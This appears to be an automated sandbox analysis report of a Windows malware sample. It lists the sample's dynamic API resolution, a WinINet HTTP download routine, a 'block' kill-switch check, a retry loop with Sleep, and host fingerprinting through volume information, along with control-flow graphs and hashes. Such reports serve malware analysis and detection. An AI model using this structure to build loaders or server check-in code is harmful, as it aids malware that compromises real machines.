                                • GetProcAddress.KERNEL32(74DD0000,016296A0), ref: 00DD9CA7
                                • GetProcAddress.KERNEL32(74DD0000,0161B608), ref: 00DD9CBF
                                • GetProcAddress.KERNEL32(74DD0000,0162D008), ref: 00DD9CD7
                                • GetProcAddress.KERNEL32(74DD0000,0162CDF8), ref: 00DD9CF0
                                • GetProcAddress.KERNEL32(74DD0000,0162CFD8), ref: 00DD9D08
                                • GetProcAddress.KERNEL32(74DD0000,0162D0E0), ref: 00DD9D20
                                • GetProcAddress.KERNEL32(74DD0000,01615A90), ref: 00DD9D39
                                • GetProcAddress.KERNEL32(74DD0000,01615870), ref: 00DD9D51
                                • GetProcAddress.KERNEL32(74DD0000,016156B0), ref: 00DD9D69
                                • GetProcAddress.KERNEL32(74DD0000,01615710), ref: 00DD9D82
                                • GetProcAddress.KERNEL32(74DD0000,0162CE70), ref: 00DD9D9A
                                • GetProcAddress.KERNEL32(74DD0000,0162CEE8), ref: 00DD9DB2
                                • GetProcAddress.KERNEL32(74DD0000,0161B630), ref: 00DD9DCB
                                • GetProcAddress.KERNEL32(74DD0000,01615730), ref: 00DD9DE3
                                • GetProcAddress.KERNEL32(74DD0000,0162CFF0), ref: 00DD9DFB
                                • GetProcAddress.KERNEL32(74DD0000,0162CF78), ref: 00DD9E14
                                • GetProcAddress.KERNEL32(74DD0000,0162CE88), ref: 00DD9E2C
                                • GetProcAddress.KERNEL32(74DD0000,0162D038), ref: 00DD9E44
                                • GetProcAddress.KERNEL32(74DD0000,01615750), ref: 00DD9E5D
                                • GetProcAddress.KERNEL32(74DD0000,0162CF00), ref: 00DD9E75
                                • GetProcAddress.KERNEL32(74DD0000,0162CED0), ref: 00DD9E8D
                                • GetProcAddress.KERNEL32(74DD0000,0162CF18), ref: 00DD9EA6
                                • GetProcAddress.KERNEL32(74DD0000,0162CF90), ref: 00DD9EBE
                                • GetProcAddress.KERNEL32(74DD0000,0162CE58), ref: 00DD9ED6
                                • GetProcAddress.KERNEL32(74DD0000,0162D020), ref: 00DD9EEF
                                • GetProcAddress.KERNEL32(74DD0000,0162CF30), ref: 00DD9F07
                                • GetProcAddress.KERNEL32(74DD0000,0162CF48), ref: 00DD9F1F
                                • GetProcAddress.KERNEL32(74DD0000,0162D0B0), ref: 00DD9F38
                                • GetProcAddress.KERNEL32(74DD0000,0162A510), ref: 00DD9F50
                                • GetProcAddress.KERNEL32(74DD0000,0162CF60), ref: 00DD9F68
                                • GetProcAddress.KERNEL32(74DD0000,0162CFA8), ref: 00DD9F81
                                • GetProcAddress.KERNEL32(74DD0000,01615770), ref: 00DD9F99
                                • GetProcAddress.KERNEL32(74DD0000,0162CE10), ref: 00DD9FB1
                                • GetProcAddress.KERNEL32(74DD0000,016157B0), ref: 00DD9FCA
                                • GetProcAddress.KERNEL32(74DD0000,0162CEB8), ref: 00DD9FE2
                                • GetProcAddress.KERNEL32(74DD0000,0162CFC0), ref: 00DD9FFA
                                • GetProcAddress.KERNEL32(74DD0000,016157F0), ref: 00DDA013
                                • GetProcAddress.KERNEL32(74DD0000,01615DF0), ref: 00DDA02B
                                • LoadLibraryA.KERNEL32(0162D080,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA03D
                                • LoadLibraryA.KERNEL32(0162CE28,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA04E
                                • LoadLibraryA.KERNEL32(0162D050,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA060
                                • LoadLibraryA.KERNEL32(0162D068,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA072
                                • LoadLibraryA.KERNEL32(0162D098,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA083
                                • LoadLibraryA.KERNEL32(0162D0C8,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA095
                                • LoadLibraryA.KERNEL32(0162CE40,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA0A7
                                • LoadLibraryA.KERNEL32(0162CEA0,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA0B8
                                • GetProcAddress.KERNEL32(75290000,01615E30), ref: 00DDA0DA
                                • GetProcAddress.KERNEL32(75290000,0162D290), ref: 00DDA0F2
                                • GetProcAddress.KERNEL32(75290000,01629078), ref: 00DDA10A
                                • GetProcAddress.KERNEL32(75290000,0162D170), ref: 00DDA123
                                • GetProcAddress.KERNEL32(75290000,01615CB0), ref: 00DDA13B
                                • GetProcAddress.KERNEL32(73540000,0161B6D0), ref: 00DDA160
                                • GetProcAddress.KERNEL32(73540000,01615D30), ref: 00DDA179
                                • GetProcAddress.KERNEL32(73540000,0161B7C0), ref: 00DDA191
                                • GetProcAddress.KERNEL32(73540000,0162D218), ref: 00DDA1A9
                                • GetProcAddress.KERNEL32(73540000,0162D140), ref: 00DDA1C2
                                • GetProcAddress.KERNEL32(73540000,01615C50), ref: 00DDA1DA
                                • GetProcAddress.KERNEL32(73540000,01615C90), ref: 00DDA1F2
                                • GetProcAddress.KERNEL32(73540000,0162D278), ref: 00DDA20B
                                • GetProcAddress.KERNEL32(752C0000,01615D90), ref: 00DDA22C
                                • GetProcAddress.KERNEL32(752C0000,01615B10), ref: 00DDA244
                                • GetProcAddress.KERNEL32(752C0000,0162D350), ref: 00DDA25D
                                • GetProcAddress.KERNEL32(752C0000,0162D1A0), ref: 00DDA275
                                • GetProcAddress.KERNEL32(752C0000,01615B30), ref: 00DDA28D
                                • GetProcAddress.KERNEL32(74EC0000,0161B888), ref: 00DDA2B3
                                • GetProcAddress.KERNEL32(74EC0000,0161B9A0), ref: 00DDA2CB
                                • GetProcAddress.KERNEL32(74EC0000,0162D1D0), ref: 00DDA2E3
                                • GetProcAddress.KERNEL32(74EC0000,01615DD0), ref: 00DDA2FC
                                • GetProcAddress.KERNEL32(74EC0000,01615C70), ref: 00DDA314
                                • GetProcAddress.KERNEL32(74EC0000,0161B8D8), ref: 00DDA32C
                                • GetProcAddress.KERNEL32(75BD0000,0162D230), ref: 00DDA352
                                • GetProcAddress.KERNEL32(75BD0000,01615CD0), ref: 00DDA36A
                                • GetProcAddress.KERNEL32(75BD0000,01629048), ref: 00DDA382
                                • GetProcAddress.KERNEL32(75BD0000,0162D3B0), ref: 00DDA39B
                                • GetProcAddress.KERNEL32(75BD0000,0162D1E8), ref: 00DDA3B3
                                • GetProcAddress.KERNEL32(75BD0000,01615C10), ref: 00DDA3CB
                                • GetProcAddress.KERNEL32(75BD0000,01615DB0), ref: 00DDA3E4
                                • GetProcAddress.KERNEL32(75BD0000,0162D3C8), ref: 00DDA3FC
                                • GetProcAddress.KERNEL32(75BD0000,0162D1B8), ref: 00DDA414
                                • GetProcAddress.KERNEL32(75A70000,01615D50), ref: 00DDA436
                                • GetProcAddress.KERNEL32(75A70000,0162D368), ref: 00DDA44E
                                • GetProcAddress.KERNEL32(75A70000,0162D188), ref: 00DDA466
                                • GetProcAddress.KERNEL32(75A70000,0162D200), ref: 00DDA47F
                                • GetProcAddress.KERNEL32(75A70000,0162D260), ref: 00DDA497
                                • GetProcAddress.KERNEL32(75450000,01615B70), ref: 00DDA4B8
                                • GetProcAddress.KERNEL32(75450000,01615C30), ref: 00DDA4D1
                                • GetProcAddress.KERNEL32(75DA0000,01615E10), ref: 00DDA4F2
                                • GetProcAddress.KERNEL32(75DA0000,0162D248), ref: 00DDA50A
                                • GetProcAddress.KERNEL32(6F280000,01615CF0), ref: 00DDA530
                                • GetProcAddress.KERNEL32(6F280000,01615BF0), ref: 00DDA548
                                • GetProcAddress.KERNEL32(6F280000,01615E50), ref: 00DDA560
                                • GetProcAddress.KERNEL32(6F280000,0162D2A8), ref: 00DDA579
                                • GetProcAddress.KERNEL32(6F280000,01615AB0), ref: 00DDA591
                                • GetProcAddress.KERNEL32(6F280000,01615BB0), ref: 00DDA5A9
                                • GetProcAddress.KERNEL32(6F280000,01615B90), ref: 00DDA5C2
                                • GetProcAddress.KERNEL32(6F280000,01615BD0), ref: 00DDA5DA
                                • GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 00DDA5F1
                                • GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 00DDA607
                                • GetProcAddress.KERNEL32(75AF0000,0162D2C0), ref: 00DDA629
                                • GetProcAddress.KERNEL32(75AF0000,01628F88), ref: 00DDA641
                                • GetProcAddress.KERNEL32(75AF0000,0162D2D8), ref: 00DDA659
                                • GetProcAddress.KERNEL32(75AF0000,0162D2F0), ref: 00DDA672
                                • GetProcAddress.KERNEL32(75D90000,01615D10), ref: 00DDA693
                                • GetProcAddress.KERNEL32(6CFB0000,0162D110), ref: 00DDA6B4
                                • GetProcAddress.KERNEL32(6CFB0000,01615D70), ref: 00DDA6CD
                                • GetProcAddress.KERNEL32(6CFB0000,0162D308), ref: 00DDA6E5
                                • GetProcAddress.KERNEL32(6CFB0000,0162D380), ref: 00DDA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 96dbca68ce029e7c3abf5b63bf256b29dec5938bb96df10218d4d11a14c2c21b
                                • Instruction ID: 0f15b2ab7e2210399ade5387349bb0a9c80d638741b505c8a2e791a0f38cad14
                                • Opcode Fuzzy Hash: 96dbca68ce029e7c3abf5b63bf256b29dec5938bb96df10218d4d11a14c2c21b
                                • Instruction Fuzzy Hash: C062FAB5710300EFC766DFA8E98896637F9F78C701B14855AA68AC324CDB3F9941DB60
                                Function 00DC6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 dc6280-dc630b call dda7a0 call dc47b0 call dda740 InternetOpenA StrCmpCA 1040 dc630d 1033->1040 1041 dc6314-dc6318 1033->1041 1040->1041 1042 dc631e-dc6342 InternetConnectA 1041->1042 1043 dc6509-dc6525 call dda7a0 call dda800 * 2 1041->1043 1045 dc64ff-dc6503 InternetCloseHandle 1042->1045 1046 dc6348-dc634c 1042->1046 1062 dc6528-dc652d 1043->1062 1045->1043 1048 dc634e-dc6358 1046->1048 1049 dc635a 1046->1049 1050 dc6364-dc6392 HttpOpenRequestA 1048->1050 1049->1050 1052 dc6398-dc639c 1050->1052 1053 dc64f5-dc64f9 InternetCloseHandle 1050->1053 1055 dc639e-dc63bf InternetSetOptionA 1052->1055 1056 dc63c5-dc6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 dc642c-dc644b call dd8940 1056->1058 1059 dc6407-dc6427 call dda740 call dda800 * 2 1056->1059 1067 dc644d-dc6454 1058->1067 1068 dc64c9-dc64e9 call dda740 call dda800 * 2 1058->1068 1059->1062 1071 dc6456-dc6480 InternetReadFile 1067->1071 1072 dc64c7-dc64ef InternetCloseHandle 1067->1072 1068->1062 1073 dc648b 1071->1073 1074 dc6482-dc6489 1071->1074 1072->1053 1073->1072 1074->1073 1078 dc648d-dc64c5 call dda9b0 call dda8a0 call dda800 1074->1078 1078->1071
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • InternetOpenA.WININET(00DE0DFE,00000001,00000000,00000000,00000000), ref: 00DC62E1
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DC63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DC63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DC646D
                                • InternetCloseHandle.WININET(00000000), ref: 00DC64EF
                                • InternetCloseHandle.WININET(00000000), ref: 00DC64F9
                                • InternetCloseHandle.WININET(00000000), ref: 00DC6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: aa94fddb9379540247e2237e1b16beee96b72f1d964a81fe6325b57bdba9cb3a
                                • Instruction ID: c3984362f2107ea0b9dd241b809b1fa5ac8b0182812f6849a6d57a36d985637b
                                • Opcode Fuzzy Hash: aa94fddb9379540247e2237e1b16beee96b72f1d964a81fe6325b57bdba9cb3a
                                • Instruction Fuzzy Hash: E7713C71A00258EBDB24DFA4CC49FEE7778FB44700F108199F50A6B284DBB5AA85CF61
                                Function 00DD5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 dd5510-dd5577 call dd5ad0 call dda820 * 3 call dda740 * 4 1106 dd557c-dd5583 1090->1106 1107 dd5585-dd55b6 call dda820 call dda7a0 call dc1590 call dd51f0 1106->1107 1108 dd55d7-dd564c call dda740 * 2 call dc1590 call dd52c0 call dda8a0 call dda800 call ddaad0 StrCmpCA 1106->1108 1124 dd55bb-dd55d2 call dda8a0 call dda800 1107->1124 1134 dd5693-dd56a9 call ddaad0 StrCmpCA 1108->1134 1138 dd564e-dd568e call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1108->1138 1124->1134 1139 dd57dc-dd5844 call dda8a0 call dda820 * 2 call dc1670 call dda800 * 4 call dd6560 call dc1550 1134->1139 1140 dd56af-dd56b6 1134->1140 1138->1134 1270 dd5ac3-dd5ac6 1139->1270 1143 dd56bc-dd56c3 1140->1143 1144 dd57da-dd585f call ddaad0 StrCmpCA 1140->1144 1148 dd571e-dd5793 call dda740 * 2 call dc1590 call dd52c0 call dda8a0 call dda800 call ddaad0 StrCmpCA 1143->1148 1149 dd56c5-dd5719 call dda820 call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1143->1149 1163 dd5865-dd586c 1144->1163 1164 dd5991-dd59f9 call dda8a0 call dda820 * 2 call dc1670 call dda800 * 4 call dd6560 call dc1550 1144->1164 1148->1144 1249 dd5795-dd57d5 call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1148->1249 1149->1144 1170 dd598f-dd5a14 call ddaad0 StrCmpCA 1163->1170 1171 dd5872-dd5879 1163->1171 1164->1270 1200 dd5a28-dd5a91 call dda8a0 call dda820 * 2 call dc1670 call dda800 * 4 call dd6560 call dc1550 1170->1200 1201 dd5a16-dd5a21 Sleep 1170->1201 1179 dd587b-dd58ce call dda820 call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1171->1179 1180 dd58d3-dd5948 call dda740 * 2 call dc1590 call dd52c0 call dda8a0 call dda800 call ddaad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 dd594a-dd598a call dda7a0 call dc1590 call dd51f0 call dda8a0 call dda800 1180->1275 1200->1270 1201->1106 1249->1144 1275->1170
                                APIs
                                  • Part of subcall function 00DDA820: lstrlen.KERNEL32(00DC4F05,?,?,00DC4F05,00DE0DDE), ref: 00DDA82B
                                  • Part of subcall function 00DDA820: lstrcpy.KERNEL32(00DE0DDE,00000000), ref: 00DDA885
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5857
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DD51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5228
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5318
                                  • Part of subcall function 00DD52C0: lstrlen.KERNEL32(00000000), ref: 00DD532F
                                  • Part of subcall function 00DD52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00DD5364
                                  • Part of subcall function 00DD52C0: lstrlen.KERNEL32(00000000), ref: 00DD5383
                                  • Part of subcall function 00DD52C0: lstrlen.KERNEL32(00000000), ref: 00DD53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00DD5A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 64f70ba3add8d78cce0295bfc9486e2d7886d57ad5b858c7972ba728f66aec7b
                                • Instruction ID: 7458b1d5586c2a8af6f13aee2b7eac06c8199bf0e5015c4dad3159a1a7654861
                                • Opcode Fuzzy Hash: 64f70ba3add8d78cce0295bfc9486e2d7886d57ad5b858c7972ba728f66aec7b
                                • Instruction Fuzzy Hash: 5EE13175910244AACB14FBA4EC52EED7338EF54300F50C12AB54657295EF35AB0DDBB2
                                Function 00DD17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 dd17a0-dd17cd call ddaad0 StrCmpCA 1304 dd17cf-dd17d1 ExitProcess 1301->1304 1305 dd17d7-dd17f1 call ddaad0 1301->1305 1309 dd17f4-dd17f8 1305->1309 1310 dd17fe-dd1811 1309->1310 1311 dd19c2-dd19cd call dda800 1309->1311 1312 dd199e-dd19bd 1310->1312 1313 dd1817-dd181a 1310->1313 1312->1309 1315 dd185d-dd186e StrCmpCA 1313->1315 1316 dd187f-dd1890 StrCmpCA 1313->1316 1317 dd1835-dd1844 call dda820 1313->1317 1318 dd18f1-dd1902 StrCmpCA 1313->1318 1319 dd1951-dd1962 StrCmpCA 1313->1319 1320 dd1970-dd1981 StrCmpCA 1313->1320 1321 dd1913-dd1924 StrCmpCA 1313->1321 1322 dd1932-dd1943 StrCmpCA 1313->1322 1323 dd18ad-dd18be StrCmpCA 1313->1323 1324 dd18cf-dd18e0 StrCmpCA 1313->1324 1325 dd198f-dd1999 call dda820 1313->1325 1326 dd1849-dd1858 call dda820 1313->1326 1327 dd1821-dd1830 call dda820 1313->1327 1338 dd187a 1315->1338 1339 dd1870-dd1873 1315->1339 1340 dd189e-dd18a1 1316->1340 1341 dd1892-dd189c 1316->1341 1317->1312 1346 dd190e 1318->1346 1347 dd1904-dd1907 1318->1347 1329 dd196e 1319->1329 1330 dd1964-dd1967 1319->1330 1332 dd198d 1320->1332 1333 dd1983-dd1986 1320->1333 1348 dd1926-dd1929 1321->1348 1349 dd1930 1321->1349 1350 dd194f 1322->1350 1351 dd1945-dd1948 1322->1351 1342 dd18ca 1323->1342 1343 dd18c0-dd18c3 1323->1343 1344 dd18ec 1324->1344 1345 dd18e2-dd18e5 1324->1345 1325->1312 1326->1312 1327->1312 1329->1312 1330->1329 1332->1312 1333->1332 1338->1312 1339->1338 1355 dd18a8 1340->1355 1341->1355 1342->1312 1343->1342 1344->1312 1345->1344 1346->1312 1347->1346 1348->1349 1349->1312 1350->1312 1351->1350 1355->1312
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00DD17C5
                                • ExitProcess.KERNEL32 ref: 00DD17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d26468b4b7e831505b52781ea50c6cc5d8a721d3fae1e722b8bf7df2a8d8f5aa
                                • Instruction ID: 4f5e1d559c8f4ddf01caf5da4d9d9d2ad9f7c6bda57e5ef2b713049bc78556a2
                                • Opcode Fuzzy Hash: d26468b4b7e831505b52781ea50c6cc5d8a721d3fae1e722b8bf7df2a8d8f5aa
                                • Instruction Fuzzy Hash: C35156B8A00209FFCB04DFA1D964BBE7BB5EB44304F14804AE856A7340D775EA55DB71
                                Function 00DD7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 dd7500-dd754a GetWindowsDirectoryA 1357 dd754c 1356->1357 1358 dd7553-dd75c7 GetVolumeInformationA call dd8d00 * 3 1356->1358 1357->1358 1365 dd75d8-dd75df 1358->1365 1366 dd75fc-dd7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 dd75e1-dd75fa call dd8d00 1365->1367 1369 dd7619-dd7626 call dda740 1366->1369 1370 dd7628-dd7658 wsprintfA call dda740 1366->1370 1367->1365 1377 dd767e-dd768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DD7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DD757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD760A
                                • wsprintfA.USER32 ref: 00DD7640
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
